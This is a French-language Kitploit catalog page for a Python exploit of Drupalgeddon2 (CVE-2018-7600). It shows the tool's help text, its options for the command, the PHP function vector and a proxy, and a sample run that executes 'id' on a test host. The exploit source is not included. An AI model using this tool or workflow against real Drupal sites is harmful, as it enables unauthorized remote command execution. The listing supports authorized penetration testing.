Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
drupalgeddon2-CVE-2018-7600 — Exploit Python pour CVE-2018-7600 (Drupalgeddon2) permettant l'exécution de commandes à distance sur des sites Drupal vulnérables via une injection de propriété dans l'API Forms, avec test de vulnérabilité intégré et support de proxy. | Kitploit
Outils/GitHubGitHub/rb4c/drupalgeddon2-cve-2018-7600
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubrb4c/drupalgeddon2-cve-2018-7600

drupalgeddon2-CVE-2018-7600

Exploit Python pour CVE-2018-7600 (Drupalgeddon2) permettant l'exécution de commandes à distance sur des sites Drupal vulnérables via une injection de propriété dans l'API Forms, avec test de vulnérabilité intégré et support de proxy.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
il y a 4 ansPas encore vérifié

Drupal - Drupalgeddon2 (CVE 2018-7600)

root@kitploit:~
$ python3 drupalgeddon.py -h
[+] drupalgeddon2 (CVE-2018-7600) exploit by Rafael Caria
usage: drupalgeddon.py [-h] --url URL [--command COMMAND] [--function FUNCTION] [--test] [--proxy PROXY]

[!] This script exploits (CVE-2018-7600) a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.

optional arguments:
  -h, --help                        affiche ce message d'aide et quitte
  --url URL, -u URL                 URL du site Drupal cible (ex : http://target.com/)
  --command COMMAND, -c COMMAND     Commande système à exécuter
  --function FUNCTION, -f FUNCTION  Fonction à utiliser comme vecteur d'attaque (défaut = passthru)
  --test                            Teste si la cible est vulnérable
  --proxy PROXY, -p PROXY           Configure un proxy au format http://127.0.0.1:8080/ (défaut = aucun)
root@kitploit:~
$ python3 drupalgeddon.py -u http://127.0.0.1 --test -c id
[+] drupalgeddon2 (CVE-2018-7600) exploit by Rafael Caria
[+] Envoi de la requête à : http://127.0.0.1
[+] Test si : http://127.0.0.1 est vulnérable
[!] La cible est vulnérable à CVE-2018-7600
[+] Déclenchement de l'exploit pour exécuter : id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
Télécharger l’outil